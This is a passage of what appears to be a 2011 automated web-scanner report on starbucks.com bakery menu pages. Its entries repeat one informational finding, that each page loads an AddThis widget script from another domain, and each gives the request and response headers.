GET /menu/food/bakery/maple-oat-pecan-scone HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:48:46 GMT
Connection: close
Content-Length: 43767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.212. http://www.starbucks.com/menu/food/bakery/marble-pound-cake  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/marble-pound-cake

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/marble-pound-cake HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:48:52 GMT
Connection: close
Content-Length: 43510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.213. http://www.starbucks.com/menu/food/bakery/marshmallow-dream-bar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/marshmallow-dream-bar

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/marshmallow-dream-bar HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:49:22 GMT
Connection: close
Content-Length: 43320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.214. http://www.starbucks.com/menu/food/bakery/morning-bun  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/morning-bun

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/morning-bun HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:49:33 GMT
Connection: close
Content-Length: 43053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.215. http://www.starbucks.com/menu/food/bakery/multigrain-bagel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/multigrain-bagel

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/multigrain-bagel HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:49:41 GMT
Connection: close
Content-Length: 43771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.216. http://www.starbucks.com/menu/food/bakery/old-fashion-glazed-doughnut  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/old-fashion-glazed-doughnut

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/old-fashion-glazed-doughnut HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:49:51 GMT
Connection: close
Content-Length: 43747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.217. http://www.starbucks.com/menu/food/bakery/outrageous-oatmeal-cookie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/outrageous-oatmeal-cookie

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/outrageous-oatmeal-cookie HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:50:41 GMT
Connection: close
Content-Length: 43551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.218. http://www.starbucks.com/menu/food/bakery/petite-vanilla-bean-scone  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/petite-vanilla-bean-scone

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/petite-vanilla-bean-scone HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:50:45 GMT
Connection: close
Content-Length: 43912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.219. http://www.starbucks.com/menu/food/bakery/plain-bagel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/plain-bagel

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/plain-bagel HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:50:53 GMT
Connection: close
Content-Length: 43409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.220. http://www.starbucks.com/menu/food/bakery/pumpkin-bread  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/pumpkin-bread

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/pumpkin-bread HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:53:32 GMT
Connection: close
Content-Length: 43311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.221. http://www.starbucks.com/menu/food/bakery/raspberry-scone  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/raspberry-scone

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/raspberry-scone HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:53:45 GMT
Connection: close
Content-Length: 43584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.222. http://www.starbucks.com/menu/food/bakery/red-velvet-cupcake  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/red-velvet-cupcake

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/red-velvet-cupcake HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:53:54 GMT
Connection: close
Content-Length: 44195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.223. http://www.starbucks.com/menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:08 GMT
Connection: close
Content-Length: 44502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.224. http://www.starbucks.com/menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:14 GMT
Connection: close
Content-Length: 44542

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.225. http://www.starbucks.com/menu/food/bakery/reduced-fat-very-berry-coffeecake  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/reduced-fat-very-berry-coffeecake

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/reduced-fat-very-berry-coffeecake HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:14 GMT
Connection: close
Content-Length: 44188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.226. http://www.starbucks.com/menu/food/bakery/starbucks-classic-coffee-cake  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/starbucks-classic-coffee-cake

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/starbucks-classic-coffee-cake HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:17 GMT
Connection: close
Content-Length: 44204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.227. http://www.starbucks.com/menu/food/bakery/treat-sized-double-chocolate-cookie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/treat-sized-double-chocolate-cookie

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/treat-sized-double-chocolate-cookie HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:24 GMT
Connection: close
Content-Length: 43150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.228. http://www.starbucks.com/menu/food/bakery/treat-sized-peanut-butter-cookie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/treat-sized-peanut-butter-cookie

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/treat-sized-peanut-butter-cookie HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:27 GMT
Connection: close
Content-Length: 43176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.229. http://www.starbucks.com/menu/food/bakery/vanilla-bean-cupcake  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/vanilla-bean-cupcake

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/vanilla-bean-cupcake HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:25 GMT
Connection: close
Content-Length: 43804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.230. http://www.starbucks.com/menu/food/bakery/zucchini-walnut-muffin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/zucchini-walnut-muffin

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/zucchini-walnut-muffin HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:42 GMT
Connection: close
Content-Length: 43338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.231. http://www.starbucks.com/menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate

Issue detail

The response dynamically includes the following script from another domain:

Request

